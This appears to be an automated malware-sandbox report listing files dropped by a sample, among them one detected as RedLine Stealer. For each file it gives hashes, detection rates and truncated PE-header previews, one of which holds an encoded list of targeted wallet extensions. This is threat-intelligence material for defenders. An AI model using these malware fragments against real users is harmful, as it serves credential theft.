                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exe

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):307712
                                                                                                                                                                                                                      Entropy (8bit):5.081279904923014
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:acZqf7D34kp/0+mA0kywMlQEg85fB1fA0PuTVAtkxzy3RMeqiOL2bBOA:acZqf7DIcnGCQNB1fA0GTV8kU0L
                                                                                                                                                                                                                      MD5:7B6730CA4DA283A35C41B831B9567F15
                                                                                                                                                                                                                      SHA1:92EF2FD33F713D72207209EC65F0DE6EEF395AF5
                                                                                                                                                                                                                      SHA-256:94D7D12AE53CE97F38D8890383C2317CE03D45BD6ECAF0E0B9165C7066CD300C
                                                                                                                                                                                                                      SHA-512:AE2D10F9895E5F2AF10B4FA87CDB7C930A531E910B55CD752B15DAC77A432CC28ECA6E5B32B95EEB21E238AAF2EB57E29474660CAE93E734D0B6543C1D462ACE
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exe, Author: Joe Security
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                      • Filename: K6qneGSDSB.exe, Detection: malicious, Browse
                                                                                                                                                                                                                      • Filename: mggoBrtk9t.exe, Detection: malicious, Browse
                                                                                                                                                                                                                      • Filename: yINR7uQlPr.exe, Detection: malicious, Browse
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@.................................<...O.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B................p.......H....... ...............(w..............................................a.u.t.o.f.i.l.l.5.t.Y.W.R.q.a.W.V.o.a.m.h.h.a.m.J.8.W.W.9.y.b.2.l.X.Y.W.x.s.Z.X.Q.K.a.W.J.u.Z.W.p.k.Z.m.p.t.b.W.t.w.Y.2.5.s.c.G.V.i.a.2.x.t.b.m.t.v.Z.W.9.p.a.G.9.m.Z.W.N.8.V.H.J.v.b.m.x.p.b.m.s.K.a.m.J.k.Y.W.9.j.b.m.V.p.a.W.l.u.b.W.p.i.a.m.x.n.Y.W.x.o.Y.2.V.s.Z.2.J.l.a.m.1.u.a.W.R.8.T.m.l.m.d.H.l.X.Y.W.x.s.Z.X.Q.K.b.m.t.i.a.W.h.m.Y.m.V.v.Z.2.F.l.Y.W.9.l.a.G.x.l.Z.m.5.r.b.2.R.i.Z.W.Z.n.c.G.d.r.b.m.5.8.T.W.

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5915958
                                                                                                                                                                                                                      Entropy (8bit):7.9860937778360945
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:98304:ce0q2B/JWHioVQWJuhswoYv5eO0zo0Ahd6y0Naxxv8fqDDAx06btVUJFaeu8+qBC:cp0HiouWJysVYvsOaoyMxxvjDDAx0aec
                                                                                                                                                                                                                      MD5:B40682DDC13C95E3C0228D09A3B6AAE2
                                                                                                                                                                                                                      SHA1:FFBAC13D000872DBF5A0BCE2B6ADDF5315E59532
                                                                                                                                                                                                                      SHA-256:F40224CA24A6D189791058779EB4C9BAB224CAA58B00BD787B1FF981D285D5A4
                                                                                                                                                                                                                      SHA-512:B186331B49E7821466FD003980F9CA57F5BCF41574C1D1893B8949D8A944FFE67F06D8A67D4BFDF4599FCD4F3282C36BED1FC8585E1F8DD541E8FDF121F48EEB
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                      • Filename: K6qneGSDSB.exe, Detection: malicious, Browse
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc...[hc..`.Qhc..g.Ihc..f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d.....]g.........."....(.....X.................@.....................................aZ...`.................................................l...x............`..."..............h.......................................@...............P............................text............................... ..`.rdata..B&.......(..................@..@.data....s..........................@....pdata..."...`...$..................@..@.rsrc...............................@..@.reloc..h...........................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\5995.tmp.update.exe

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):309760
                                                                                                                                                                                                                      Entropy (8bit):6.298481352377728
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6144:CJqAvoYumbeaLVA/HmH6iWmZx/M+VK0lA/OBYJ0tYRVxG2PTY:3AvoYumb9VA/m9WmZxlVK0lAZ/PTY
                                                                                                                                                                                                                      MD5:DA8FEE4A89F0B7CEE6C8AEE970044116
                                                                                                                                                                                                                      SHA1:226A6FBD66992A0F2DDBF5D7572FAB2CF8F5001E
                                                                                                                                                                                                                      SHA-256:4A55DA3C91388A8EA539FC750B52DD90AF5D2F33F2E7269A73C2146243ED24CD
                                                                                                                                                                                                                      SHA-512:9174BD1C379ED76BE342400949A1E431A6430297485FD9C48ED12C60E7DE94817B75D645C4EBB17B3A79D66BA813C40C36527F912E927A8EC27E4668D9C09DD8
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.Z.'.4A'.4A'.4A..A$.4A'.5A-.4AH..A-.4AH..A&.4AH..A&.4ARich'.4A................PE..d....r^g.........."......:...4.......4.........@..........................................@.................................................pr..(.......(.......L....................................................................P..X............................text....8.......:.................. ..`.rdata...#...P...$...>..............@..@.data...............................@....pdata..L............b..............@..@.rsrc...(............f..............@..@.x64.....P.......P...j..................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\VCRUNTIME140.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):89752
                                                                                                                                                                                                                      Entropy (8bit):6.5021374229557996
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:EFmmAQ77IPzHql9a2k+2v866Xc/0i+N1WtYil42TZiCvecbtjawN+o/J:EQmI+NnXertP42xvecbtjd+ox
                                                                                                                                                                                                                      MD5:0E675D4A7A5B7CCD69013386793F68EB
                                                                                                                                                                                                                      SHA1:6E5821DDD8FEA6681BDA4448816F39984A33596B
                                                                                                                                                                                                                      SHA-256:BF5FF4603557C9959ACEC995653D052D9054AD4826DF967974EFD2F377C723D1
                                                                                                                                                                                                                      SHA-512:CAE69A90F92936FEBDE67DACD6CE77647CB3B3ED82BB66463CD9047E90723F633AA2FC365489DE09FECDC510BE15808C183B12E6236B0893AF19633F6A670E66
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............x.D.x.D.x.D..AD.x.D..=D.x.D.x.D.x.Dx..E.x.Dx..E.x.Dx..E.x.Dx..E.x.Dx..E.x.Dx.QD.x.Dx..E.x.DRich.x.D........PE..d....}.Y.........." .........T...............................................`.......Y....`A........................................p...4............@.......0..(.... ...>...P..p.......8...........................@................................................text...$........................... ..`.rdata...6.......8..................@..@.data...0.... ......................@....pdata..(....0......................@..@.rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\_bz2.pyd

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):84040
                                                                                                                                                                                                                      Entropy (8bit):6.41469022264903
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:SSpo7/9ZwseNsUQJ8rbXis0WwOpcAE+8aoBnuRtApxbBVZIG4VJyI:SSW7lZws+bLwOpvEZa+uRWVVZIG4VF
                                                                                                                                                                                                                      MD5:3DC8AF67E6EE06AF9EEC52FE985A7633
                                                                                                                                                                                                                      SHA1:1451B8C598348A0C0E50AFC0EC91513C46FE3AF6
                                                                                                                                                                                                                      SHA-256:C55821F5FDB0064C796B2C0B03B51971F073140BC210CBE6ED90387DB2BED929
                                                                                                                                                                                                                      SHA-512:DA16BFBC66C8ABC078278D4D3CE1595A54C9EF43AE8837CEB35AE2F4757B930FE55E258827036EBA8218315C10AF5928E30CB22C60FF69159C8FE76327280087
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H.1.).b.).b.).b.Qib.).b.A.c.).bM.=b.).b.A.c.).b.A.c.).b.A.c.).bD@.c.).b.O.c.).b.).b.).bD@.c.).bD@.c.).bD@.b.).bD@.c.).bRich.).b................PE..d.....].........." .........f......t........................................p.......a....`.............................................H............P.......@..(.......H....`......p...T...............................................8............................text...>........................... ..`.rdata..~A.......B..................@..@.data........0......................@....pdata..(....@......................@..@.rsrc........P....... ..............@..@.reloc.......`.......,..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\_ctypes.pyd

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):123464
                                                                                                                                                                                                                      Entropy (8bit):5.886703955852103
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:qpG85kJGmH3c+5M333KvUPzeENGLf3Tz4ccUZw1IGVPE:qDSGT+5+KMPzyLf3TEcKu
                                                                                                                                                                                                                      MD5:F1E33A8F6F91C2ED93DC5049DD50D7B8
                                                                                                                                                                                                                      SHA1:23C583DC98AA3F6B8B108DB5D90E65D3DD72E9B4
                                                                                                                                                                                                                      SHA-256:9459D246DF7A3C638776305CF3683946BA8DB26A7DE90DF8B60E1BE0B27E53C4
                                                                                                                                                                                                                      SHA-512:229896DA389D78CBDF2168753ED7FCC72D8E0E62C6607A3766D6D47842C0ABD519AC4F5D46607B15E7BA785280F9D27B482954E931645337A152B8A54467C6A5
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U..4..4..4..L@..4..\..4..\..4..\..4..\..4..]..4..R..4..R..4..]..4..4.i4..]..4..]..4..],..4..]..4.Rich.4.........PE..d.....].........." .................]....................................................`..........................................`......$a..........................H...........0...T...............................................`............................text............................... ..`.rdata..0l.......n..................@..@.data....>.......:...l..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\_hashlib.pyd

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):45640
                                                                                                                                                                                                                      Entropy (8bit):5.996546047346997
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:8skeCps0iszzPFrGE/CBAdIPGV03ju774xxIGsIx7WDG4yw:81eCpLzDBZ+AdIPmYju7OxIGsIxWyw
                                                                                                                                                                                                                      MD5:A6448BC5E5DA21A222DE164823ADD45C
                                                                                                                                                                                                                      SHA1:6C26EB949D7EB97D19E42559B2E3713D7629F2F9
                                                                                                                                                                                                                      SHA-256:3692FC8E70E6E29910032240080FC8109248CE9A996F0A70D69ACF1542FCA69A
                                                                                                                                                                                                                      SHA-512:A3833C7E1CF0E4D181AC4DE95C5DFA685CF528DC39010BF0AC82864953106213ECCFF70785021CCB05395B5CF0DCB89404394327CD7E69F820D14DFA6FBA8CBA
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2..&v.uv.uv.u...ur.u$..tt.u$..t}.u$..t~.u$..tt.u...tt.u.ts.uv.u..u.tw.u.tw.u.iuw.u.tw.uRichv.u................PE..d.....].........." .....@...Z......X2...............................................7....`..........................................u..P...@v..........................H............X..T...........................`X...............P...............................text....?.......@.................. ..`.rdata..p3...P...4...D..............@..@.data...h............x..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\_lzma.pyd

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):252488
                                                                                                                                                                                                                      Entropy (8bit):6.080982550390949
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6144:bkHDwqjhhwYbOqQNEkT/4OQhJwAbHoqLNvka/gOFhUw6b4qCNxkV/3OdhAWwPbGE:bd7/IbtSKOt
                                                                                                                                                                                                                      MD5:37057C92F50391D0751F2C1D7AD25B02
                                                                                                                                                                                                                      SHA1:A43C6835B11621663FA251DA421BE58D143D2AFB
                                                                                                                                                                                                                      SHA-256:9442DC46829485670A6AC0C02EF83C54B401F1570D1D5D1D85C19C1587487764
                                                                                                                                                                                                                      SHA-512:953DC856AD00C3AEC6AEAB3AFA2DEB24211B5B791C184598A2573B444761DB2D4D770B8B807EBBA00EE18725FF83157EC5FA2E3591A7756EB718EBA282491C7C
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0d..^7..^7..^7..7..^7.._6..^7..[6..^7..Z6..^7..]6..^7Q._6..^7.._6..^7.._7..^7Q.S6..^7Q.^6..^7Q..7..^7Q.\6..^7Rich..^7........PE..d.....].........." .................6..............................................o*....`............................................L.......x.......................H.......$...@...T............................................... ............................text............................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\_socket.pyd

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):78920
                                                                                                                                                                                                                      Entropy (8bit):6.061178831576516
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:KzMe79sDb+eGm08Vr5lcDAB9/s+7+pkaOz3CkNA9y1IGVwCyMPbi:de79u8/GFmAB9/se+pROz3jN1IGVw+Pm
                                                                                                                                                                                                                      MD5:D6BAE4B430F349AB42553DC738699F0E
                                                                                                                                                                                                                      SHA1:7E5EFC958E189C117ECCEF39EC16EBF00E7645A9
                                                                                                                                                                                                                      SHA-256:587C4F3092B5F3E34F6B1E927ECC7127B3FE2F7FA84E8A3D0C41828583BD5CEF
                                                                                                                                                                                                                      SHA-512:A8F8FED5EA88E8177E291B708E44B763D105907E9F8C9E046C4EEBB8684A1778383D1FBA6A5FA863CA37C42FD58ED977E9BB3A6B12C5B8D9AB6EF44DE75E3D1E
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........1..._..._..._....._...^.._...Z..._...[..._...\.._.a.^.._...^.._...^.B._.a.R..._.a._..._.a..._.a.]..._.Rich.._.................PE..d.....].........." .....x..........h........................................`.......2....`.............................................P...0........@.......0..........H....P.........T...........................@................................................text....v.......x.................. ..`.rdata...v.......x...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-console-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20248
                                                                                                                                                                                                                      Entropy (8bit):7.035406046605262
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:iWEhWL4+QpBj0HRN7aebXQHRN7LgkSIlexkdT:Qv+qWaM8V6U
                                                                                                                                                                                                                      MD5:B56D69079D2001C1B2AF272774B53A64
                                                                                                                                                                                                                      SHA1:67EDE1C5A71412B11847F79F5A684EABAF00DE01
                                                                                                                                                                                                                      SHA-256:F3A41D882544202B2E1BDF3D955458BE11FC7F76BA12668388A681870636F143
                                                                                                                                                                                                                      SHA-512:7EB8FE111DD2E1F7E308B622461EB311C2B9FC4EF44C76E1DEF6C524EB7281D5522AF12211F1F91F651F2B678592D2997FE4CD15724F700DEAFF314A1737B3A8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0...........`.........................................`...+............ ...................A..............8............................................................................rdata..@...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-datetime-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19736
                                                                                                                                                                                                                      Entropy (8bit):7.0443036655888225
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:vWEhW/4+QpBj0HRN7TQHRN7Gp1x09lge9://+qWT8Gps9
                                                                                                                                                                                                                      MD5:5AF784F599437629DEEA9FE4E8EB4799
                                                                                                                                                                                                                      SHA1:3C891B920FD2703EDD6881117EA035CED5A619F6
                                                                                                                                                                                                                      SHA-256:7E5BD3EE263D09C7998E0D5FFA684906DDC56DA61536331C89C74B039DF00C7C
                                                                                                                                                                                                                      SHA-512:4DF58513CF52511C0D2037CDC674115D8ED5A0ED4360EB6383CC6A798A7037F3F7F2D587797223ED7797CCD476F1C503B3C16E095843F43E6B87D55AD4822D70
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0......ey....`.........................................`................ ...................A..............8............................................................................rdata..$...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-debug-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19736
                                                                                                                                                                                                                      Entropy (8bit):7.049693596229206
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:UPWEhWcHHV/McJW65FdQpBjSdHnhWgN7a8WckW65FdQHnhWgN7a8WshFoodqnajK:wWEhWmJ7QpBj0HRN7GQHRN7FhSIlexEk
                                                                                                                                                                                                                      MD5:E1CA15CF0597C6743B3876AF23A96960
                                                                                                                                                                                                                      SHA1:301231F7250431BD122B12ED34A8D4E8BB379457
                                                                                                                                                                                                                      SHA-256:990E46D8F7C9574A558EBDFCB8739FBCCBA59D0D3A2193C9C8E66807387A276D
                                                                                                                                                                                                                      SHA-512:7C9DACD882A0650BF2F553E9BC5647E6320A66021AC4C1ADC802070FD53DE4C6672A7BACFD397C51009A23B6762E85C8017895E9347A94D489D42C50FA0A1C42
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0............`.........................................`................ ...................A..............8............................................................................rdata..0...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-errorhandling-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19736
                                                                                                                                                                                                                      Entropy (8bit):7.0758779488098416
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:FvfC5WEhWllQpBj0HRN77lQHRN7QSkclsHd/:Fi5uqWB8Q7/
                                                                                                                                                                                                                      MD5:8D6599D7C4897DCD0217070CCA074574
                                                                                                                                                                                                                      SHA1:25EACAAA4C6F89945E97388796A8C85BA6FB01FB
                                                                                                                                                                                                                      SHA-256:A011260FAFAAAEFD7E7326D8D5290C6A76D55E5AF4E43FFA4DE5FEA9B08FA928
                                                                                                                                                                                                                      SHA-512:E8E2E7C5BFF41CCAA0F77C3CFEE48DAC43C11E75688F03B719CC1D716DB047597A7A2CE25B561171EF259957BDCD9DD4345A0E0125DB2B36F31698BA178E2248
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................0.......j....`.........................................`................ ...................A..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-file-l1-1-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):23320
                                                                                                                                                                                                                      Entropy (8bit):6.972639549935684
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:2BPvVX7WEhWXqEQpBj0HRN7UQHRN7mSIlexb:+PvVXDqHqWU8m6l
                                                                                                                                                                                                                      MD5:642B29701907E98E2AA7D36EBA7D78B8
                                                                                                                                                                                                                      SHA1:16F46B0E057816F3592F9C0A6671111EA2F35114
                                                                                                                                                                                                                      SHA-256:5D72FEAC789562D445D745A55A99536FA9302B0C27B8F493F025BA69BA31941C
                                                                                                                                                                                                                      SHA-512:1BEAB2B368CC595BEB39B2F5A2F52D334BC42BF674B8039D334C6D399C966AFF0B15876105F0A4A54FA08E021CB44907ED47D31A0AF9E789EB4102B82025CF57
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...".NV.........." .........................................................@............`.........................................`................0...................A..............8............................................................................rdata..............................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-file-l1-2-0.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19736
                                                                                                                                                                                                                      Entropy (8bit):7.053716052760641
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:9ZWEhWwqEQpBj0HRN7xnE77QHRN7ICMlly:9ZJHqWNE778r
                                                                                                                                                                                                                      MD5:F0C73F7454A5CE6FB8E3D795FDB0235D
                                                                                                                                                                                                                      SHA1:ACDD6C5A359421D268B28DDF19D3BCB71F36C010
                                                                                                                                                                                                                      SHA-256:2A59DD891533A028FAE7A81E690E4C28C9074C2F327393FAB17329AFFE53FD7B
